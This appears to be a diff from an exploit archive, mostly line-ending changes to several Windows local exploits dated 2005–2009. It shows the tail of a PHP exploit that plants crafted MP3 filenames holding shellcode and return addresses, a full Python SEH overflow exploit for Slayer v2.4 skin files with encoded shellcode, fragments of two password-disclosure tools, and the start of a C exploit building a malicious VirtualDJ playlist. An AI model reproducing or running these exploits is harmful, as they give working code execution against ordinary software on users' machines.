"\xb0\x42\x83\x72\x00\x00\x0d\x20\x00\x00\x01\x14\x35\xa8\xf0\x04\x3e\x8d\xc8\x00\x00\x34\x80\x00\x00\x04\x00\x20\xc0\x01\xf2\x67". "\x21\x27\x0e\x60\x05\x16\x77\x3c\x84\x69\xc8\xdf\xff\xff\xf3\x9d\xe4\x21\x18\xe0\x00\x04\x65\xa6\x9a\x74\xcb\xe5\xf2\x7d\x22\x18". "\x18\xd0\x58\x43\x15\x8a\x50\xd4\x73\xc9\xf2\xfb\xa0\x82\x09\xbd\x48\x20\x85\x68\x20\x85\x34\xd3\xa9\x37\x41\x66\xea\x41\xbf\xab". "\x41\x04\x2b\x4d\x37\xa6\x9b\xd0\x41\x0d\x06\xff\xff\xff\xad\x34\xd2\x20\x06\xa4\xd9\xbb\xad\x34\xd3\xd0\x41\xaa\x41\xb5\xff\xd3". "\x48\xdd\x46\x0f\xf6\x8b\xd4\x95\x75\x15\x24\x60\x4c\x3f\xc8\x95\x53\x6c\x09\x23\x5b\x55\xae\xbd\x73\xaf\xbc\x7c\xfd\xeb\x3f\x5f". "\x74\x92\x29\x7f\x2e\x71\xa2\x67\x78\xc7\xdd\xbd\xeb\x5a\xef\x35\x7a\x8b\x4b\xc4\xd1\x74\xd5\x44\x08\x59\xc2\x52\x10\x18\x03\x65". "\x80\xe2\x81\x85\x43\xb2\x5d\x26\x88\xb1\x16\x27\x92\x5a\x46\xc6\x49\x3d\x13\x13\x54\x98\xc4\xc4\xd5\x92\x32\x76\x3e\x4d\x0b\x34". "\x6b\x1b\xa6\x79\x16\x5d\x9d\x2a\xd1\x4a\x89\x89\xab\x24\x64\x93\x4c\x8c\x9d\xcf\x14\x46\x5c\x64\x0e\xb9\xe5\xba\xb7\xd7\xba\xaa". "\xba\x96\xb6\xa4\x75\x48\x13\xc1\xf1\x05\x04\x97\x12\x27\x8c\x51\x64\x8b\xc9\x3d\x13\x24\x9d\x91\x47\x75\xd4\xee\xc8\xb9\x18\x62". "\x28\xe5\xa2\xeb\xca\xb2\x7b\x9b\xcb\x17\x77\x57\x84\x20\x04\x09\x49\x4a\x87\xb2\x30\x2b\x22\x52\x9f\x1a\xa7\xfa\xce\xfd\xef\x47". "\x94\xa3\xc8\x90\x1e\x66\x25\x91\xa3\xd4\xe2\xc7\x1f\x3b\x7f\x1e\xf7\xbc\x37\xef\xe3\xd3\x3e\x9a\x65\xf3\x76\x93\x65\xf2\xf8\xe5". "\x86\x47\x04\xf2\x81\xb6\x00\x16\x6c\x65\x4a\xef\x74\x10\x41\x37\x6a\x08\x20\x60\x68\x99\x9a\x69\x9b\xbd\x35\x1c\x27\x0c\x48\x99". "\x38\x4e\x13\x64\xfb\xa1\x98\x17\x10\x41\x74\xd3\x4d\x34\x19\x6b\x2f\x9a\x54\x82\x88\xa1\x38\xff\xfb\x92\x64\x38\x8d\xf5\x62\x6a". "\xbb\x81\x0f\xa3\x72\x00\x00\x0d\x20\x00\x00\x01\x0e\x71\x6a\xf2\x21\x8e\x0d\xc8\x00\x00\x34\x80\x00\x00\x04\x66\x1d\x51\x49\x92". "\x44\x50\xd0\xc0\xd1\x03\x03\x43\x74\xd3\xad\xf5\x3a\xb4\x18\xc0\xb8\x79\x33\x33\x83\x5c\x2c\x18\x2c\x64\xb8\xb2\xf9\x99\x7d\x34". "\xd4\x87\x41\x69\xd4\x60\x68\xd4\xd6\x66\x6f\x98\x11\x03\xa2\xe5\x36\x4c\xa0\x79\x34\xe5\xdd\xaa\xfb\x36\xca\x14\x04\x04\x04\x98";
+        $____x = 0x35;
+        $____v = (strlen($_SERVER["USERPROFILE"]) % 4);
+        $____x = $____x - $____v;
+        //addresses that worked for me...
+        //$____pad = str_repeat("\x73\xb2\x42\x77",$____x); //0x7742b27f COMCTL32.DLL->0x10003dcc call edi, JetCFG.dll
+        //$____pad = str_repeat("\xe9\x62\xe0\x77",$____x); //0x77e062f5 RPCRT4.DLL->0x7d03388b call edi, SHELL32.DLL
+        //$____pad = str_repeat("\x23\xa2\xae\x76",$____x); //0x76aea22f ATL.DLL->0x10003dcc call edi, JetCFG.dll
+        $____pad = str_repeat("\xf3\xa5\xc0\x77", $____x); //0x77c0a5ff MSVCRT.DLL->0x10003dcc call edi, JetCFG.dll, best one
+        for ($i = 0; $i < 4; $i++)
+        {
+                $____junk = str_repeat("_", $i);
+                $____fname = "_9sg__mzk_".$____junk.$____pad.".MP3";
+                $____path = $_SERVER["USERPROFILE"]."\\Desktop\\".$____fname;
+                $____x = fopen($____path, "w+");
+                if (!$____x)
+                {
+                        die("[!] Unable to create ".$____path." ...");
+                }
+                fputs ($____x, $____BOOM);
+                fclose($____x);
+                print("[*] ".$____path." created!\n");
+                if ($i == $____v)
+                        {
+                        print("[?] This will hit the right offset on your system! Do you like my composition?\n");
+                }
+        }
+?>
+
+# milw0rm.com [2009-05-26]
diff --git a/platforms/windows/local/8789.py b/platforms/windows/local/8789.py
index ea1ac6873..a2fddac32 100755
--- a/platforms/windows/local/8789.py
+++ b/platforms/windows/local/8789.py
@@ -1,94 +1,94 @@
-#!/usr/bin/python
-print "**************************************************************************"
-print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n"
-print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n"
-print "[~]Email : sunhouse2@yahoo.com\n"
-print "[~]HOME  : http://www.snakespc.com\n" 
-print "[~]Tested on: Windows XP Pro SP3 (FR)\n"
-print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n"
-print "**************************************************************************"       
-
-import os
-
-header1=(
-"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64"
-"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62"
-"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61"
-"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72"
-"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73"
-"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70"
-"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d")
-
-header2=(
-"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67"
-"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f"
-"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61"
-"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33"
-"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34"
-"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34"
-"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c"
-"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53"
-"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75"
-"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41"
-"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f"
-"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39"
-"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53"
-"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32"
-"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f"
-"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72"
-"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30"
-"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36"
-"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d"
-"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c"
-"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59"
-"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46"
-"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d"
-"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39"
-"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e"
-"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72"
-"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33"
-"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a"
-"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69"
-"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36"
-"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35"
-"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46"
-"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36"
-"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d"
-"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c"
-"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31"
-"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35"
-"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53"
-"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35"
-"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a")
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode=(
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"
-"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79"
-"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75"
-"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31"
-"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a"
-"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18"
-"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7"
-"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54"
-"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38"
-"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c")
-
-payload =  header1
-payload += "\x41"*(348-len(shellcode))
-payload += shellcode
-payload += "\xE9\x5B\xFF\xFF\xFF"
-payload += "\x90"*15
-payload += "\xEB\xEA\xFF\xFF"
-payload += "\x50\x37\x40"
-payload +=  header2
-try:
-	os.mkdir("sunhouse")
-	out_file = open(r'SuNHouSe/skin.ini', 'w')
-	out_file.write(payload)
-	out_file.close()
-	raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-05-26]
+#!/usr/bin/python
+print "**************************************************************************"
+print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n"
+print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n"
+print "[~]Email : sunhouse2@yahoo.com\n"
+print "[~]HOME  : http://www.snakespc.com\n" 
+print "[~]Tested on: Windows XP Pro SP3 (FR)\n"
+print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n"
+print "**************************************************************************"       
+
+import os
+
+header1=(
+"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64"
+"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62"
+"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61"
+"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72"
+"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73"
+"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70"
+"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d")
+
+header2=(
+"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67"
+"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f"
+"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61"
+"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33"
+"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34"
+"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34"
+"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c"
+"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53"
+"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75"
+"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41"
+"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f"
+"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39"
+"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53"
+"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32"
+"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f"
+"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72"
+"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30"
+"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36"
+"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d"
+"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c"
+"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59"
+"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46"
+"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d"
+"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39"
+"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e"
+"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72"
+"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33"
+"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a"
+"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69"
+"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36"
+"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35"
+"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46"
+"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36"
+"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d"
+"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c"
+"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31"
+"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35"
+"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53"
+"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35"
+"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a")
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode=(
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"
+"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79"
+"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75"
+"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31"
+"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a"
+"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18"
+"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7"
+"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54"
+"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38"
+"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c")
+
+payload =  header1
+payload += "\x41"*(348-len(shellcode))
+payload += shellcode
+payload += "\xE9\x5B\xFF\xFF\xFF"
+payload += "\x90"*15
+payload += "\xEB\xEA\xFF\xFF"
+payload += "\x50\x37\x40"
+payload +=  header2
+try:
+	os.mkdir("sunhouse")
+	out_file = open(r'SuNHouSe/skin.ini', 'w')
+	out_file.write(payload)
+	out_file.close()
+	raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-05-26]
diff --git a/platforms/windows/local/884.cpp b/platforms/windows/local/884.cpp
index 03496d1aa..d2c52402d 100755
--- a/platforms/windows/local/884.cpp
+++ b/platforms/windows/local/884.cpp
@@ -109,6 +109,6 @@ strcpy(pwdfile,strcat(prgfiles,"\\TheSnookerClub\\iSnooker\\MyDetails.txt"));
        printf("Password        : %s\n",password);
 
        return 0;
-}
-
-// milw0rm.com [2005-03-16]
+}
+
+// milw0rm.com [2005-03-16]
diff --git a/platforms/windows/local/885.cpp b/platforms/windows/local/885.cpp
index ac275f3a3..422d5b82b 100755
--- a/platforms/windows/local/885.cpp
+++ b/platforms/windows/local/885.cpp
@@ -108,6 +108,6 @@ int main()
        printf("Password        : %s\n",password);
 
        return 0;
-}
-
-// milw0rm.com [2005-03-16]
+}
+
+// milw0rm.com [2005-03-16]
diff --git a/platforms/windows/local/8863.c b/platforms/windows/local/8863.c
index 056aaa542..f76248740 100755
--- a/platforms/windows/local/8863.c
+++ b/platforms/windows/local/8863.c
@@ -1,141 +1,141 @@
-#include 
-#include 
-#include 
-#include 
-#include 
-
-unsigned char rawData[] =
-{
-    0x23, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x44, 0x4A, 0x20, 0x50, 0x6C, 0x61, 0x79, 0x6C, 
-    0x69, 0x73, 0x74, 0x0D, 0x0A, 0x23, 0x4D, 0x69, 0x78, 0x54, 0x79, 0x70, 0x65, 0x3D, 0x53, 0x6D, 
-    0x61, 0x72, 0x74, 0x0D, 0x0A, 0x49, 0x3A, 0x5C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x59, 0x59, 0x59, 
